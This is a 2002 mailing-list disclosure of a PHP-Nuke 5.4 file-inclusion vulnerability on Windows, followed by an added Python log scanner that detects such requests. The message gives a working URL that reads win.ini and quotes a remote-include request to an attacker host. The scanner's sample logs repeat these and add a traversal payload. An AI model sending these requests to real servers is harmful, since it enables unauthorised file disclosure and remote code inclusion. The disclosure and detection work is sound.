On Mon, 21 Jan 2002 09:48:16 -0700 (MST), you wrote:

>Roman,
>
>I'll approve the post you sent yesterday.

Dave,

I haven't seen my post in bugtraq. Did you perhaps forget it? I've included the fixed version of the post so you can directly cc to bugtraq, if you consider it appropriate.

Cheers.
--Rom.

------------------------

Hi.

I did some quick tests on a php-nuke running on Apache for *Windows*. The PHPNuke version I tested was 5.4 (which is the last release of phpnuke at the time of testing).

I couldn't reproduce your exploit. I always get something like:

    Warning: Failed opening 'http://attackingwebserver/evil.php' for inclusion (include_path='') in c:\php\index.php on line 113

Nevertheless I realized that this other URL works:

    http://victimserver/index.php?file=c:\winnt\win.ini

The former exploit shows the contents of the win.ini file. At least it worked for me :-)

Since the tested phpnuke version is the last version at the time of writing, I cc'ed this to Francisco Burzi (phpnuke author) 'cause it seems like new stuff. This happened during last week.

Greetz,
--RoMaNSoFt
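
A detection sketch for the two request shapes in the message above, added here as an example and not part of the original post or of PHP-Nuke's code. It scans web server access logs for `file` parameter values that are URLs or absolute Windows paths and, going beyond the post, also flags Unix absolute paths and `..` traversal. The log lines are constructed samples, and the function and rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not from the original post.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jan/2002:09:00:01 -0700] "GET /index.php?file=article.php HTTP/1.0" 200 5120',
    '192.0.2.11 - - [21/Jan/2002:09:00:02 -0700] "GET /index.php?file=c:\\winnt\\win.ini HTTP/1.0" 200 477',
    '192.0.2.12 - - [21/Jan/2002:09:00:03 -0700] "GET /index.php?file=http://attackingwebserver/evil.php HTTP/1.0" 200 310',
    '192.0.2.13 - - [21/Jan/2002:09:00:04 -0700] "GET /index.php?file=..%2F..%2Fconfig.php HTTP/1.0" 200 120',
    '192.0.2.14 - - [21/Jan/2002:09:00:05 -0700] "GET /index.php?name=News HTTP/1.0" 200 900',
]

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Ordered rules: the first pattern that matches the decoded value wins.
RULES = [
    ("remote-url", re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)),
    ("windows-absolute-path", re.compile(r'^(?:[a-z]:[\\/]|\\\\)', re.I)),
    ("unix-absolute-path", re.compile(r'^/')),
    ("directory-traversal", re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')),
]

def classify_file_param(value):
    """Return a label for a suspicious include target, or None if it looks benign."""
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return None

def scan(lines, param="file"):
    """Return (client, label, decoded value) for each flagged request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs percent-decodes, so encoded separators such as %2F are caught too.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify_file_param(value)
            if label:
                findings.append((line.split()[0], label, value))
    return findings

if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(f"{client}\t{label}\t{value}")
```

The durable fix belongs on the server side: the script should map the parameter to a fixed set of known page files rather than passing the request value to the include.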